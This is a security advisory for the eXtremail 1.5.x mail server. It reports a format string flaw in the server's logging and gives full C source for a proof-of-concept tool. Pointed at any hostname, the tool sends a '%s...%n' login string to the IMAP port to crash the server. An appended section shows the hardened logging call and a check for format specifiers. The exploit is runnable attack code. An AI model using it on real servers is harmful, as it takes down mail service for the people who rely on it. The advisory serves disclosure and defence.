Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String

What's eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols. It includes support for virtual domains, spoofing attack, SSL connection and Antivirus checking.

Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail, allowing remote attackers to gain root privileges. This security flaw can be exploited by supplying a specially crafted string containing format specifiers to various SMTP, POP and IMAP commands. The vulnerability, which has been reported to affect some previous versions (BugTraq ID: 2908), has been reintroduced in the latest version of eXtremail.

Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received

After a successful denial of service attack, eXtremail must be restarted to regain its functionality (Smtpd, Pop3d, Imapd, Remt).
Proof of Concept:

------ eXtremail-kill.c --------

/**********************************************
 *              Proof of Concept              *
 *      eXtremail 1.5.x Denial of Service     *
 *                                            *
 *   Luca Ercoli <luca.e [at] seeweb.com>     *
 *       Seeweb http://www.seeweb.com         *
 *                                            *
 **********************************************/

#include <stdio.h>
#include <stdlib.h>     /* exit */
#include <string.h>     /* memset, strlen */
#include <unistd.h>     /* sleep, close, fork */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100

int main(int argc, char *argv[]);
void crash(char *host,int TYPE);

int numbytes;

/* Connects to the IMAP port and reads the banner. With TYPE == 0 the
 * login line containing format specifiers is sent; with TYPE == 1 the
 * function only connects and reads, as a liveness probe. */
void crash(char *host,int TYPE)
{
    int sockfd;
    char buf[MAXRECVSIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;
    char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";

    if ((he=gethostbyname(host)) == NULL)
    {
        perror("gethostbyname");
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("socket");
        exit(1);
    }

    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
        perror("connect");
        exit(1);
    }

    if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
    {
        perror("recv");
        exit(1);
    }

    buf[numbytes] = '\0';

    if (TYPE == 0)
    {
        printf("[+] Server -> %s",buf);
        sleep(1);
        printf("\n[!] Sending malicious packet...\n");
        send(sockfd,poc, strlen(poc), 0);
        sleep(1);
        printf ("\n[+] Sent!\n");
    }

    close(sockfd);
}

int main(int argc, char *argv[])
{
    printf("\n\n eXtremail 1.5.x Denial of Service \n");
    printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");

    if (argc != 2)
    {
        fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
        exit(1);
    }

    crash(argv[1],0);

    numbytes=0;

    printf ("\n[+] Checking server status ...\n");

    /* The probe runs in a child process, so the numbytes it sets is not
     * visible to the parent: the message below is printed regardless of
     * the server's state and is not a reliable status check. */
    if(!fork()) crash(argv[1],1);

    sleep(5);

    if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

    return 0;
}

-------------------------------

Solution:

No solution available at the moment.

Credits:

-- Luca Ercoli <luca.e [at] seeweb.com>
Seeweb http://www.seeweb.com
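
Added example (not part of the original advisory and not eXtremail's code, whose source is not shown here): the usual shape of a format string bug in a logging routine, kept in a comment, next to the hardened call, plus a simple check that flags conversion specifiers in an untrusted protocol line. The function names and the sample input are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Assumed shape of the bug class: user text is folded into a message that
 * is then used as the format itself, for example
 *
 *     snprintf(msg, sizeof msg, "IMAP - Error: User %s", user);
 *     fprintf(logfile, msg);      <- msg is data, not a format string
 *
 * With "%s" or "%n" in user, the second call reads or writes through
 * whatever happens to be on the stack. */

/* Hardened form: the format is a constant and the untrusted text is only
 * ever passed as an argument, so specifiers in it are logged verbatim. */
int log_user_error(char *out, size_t n, const char *user)
{
    return snprintf(out, n, "IMAP - Error: User %s", user);
}

/* Counts printf-style conversion specifiers in untrusted input.
 * "%%" is a literal percent sign and a trailing lone '%' is ignored.
 * A non-zero result on a login or user field is a detection signal. */
int count_format_specifiers(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* escaped percent, skip both characters */
            s++;
            continue;
        }
        if (s[1] != '\0')
            count++;
    }
    return count;
}

int main(void)
{
    const char *user = "%s%s%n";    /* constructed sample input */
    char line[128];

    log_user_error(line, sizeof line, user);
    printf("%s\n", line);
    printf("specifiers in input: %d\n", count_format_specifiers(user));
    return 0;
}
```

Building with -Wformat -Wformat-security makes GCC and Clang warn about calls whose format argument is not a string literal, which is how this class of bug is usually caught before release.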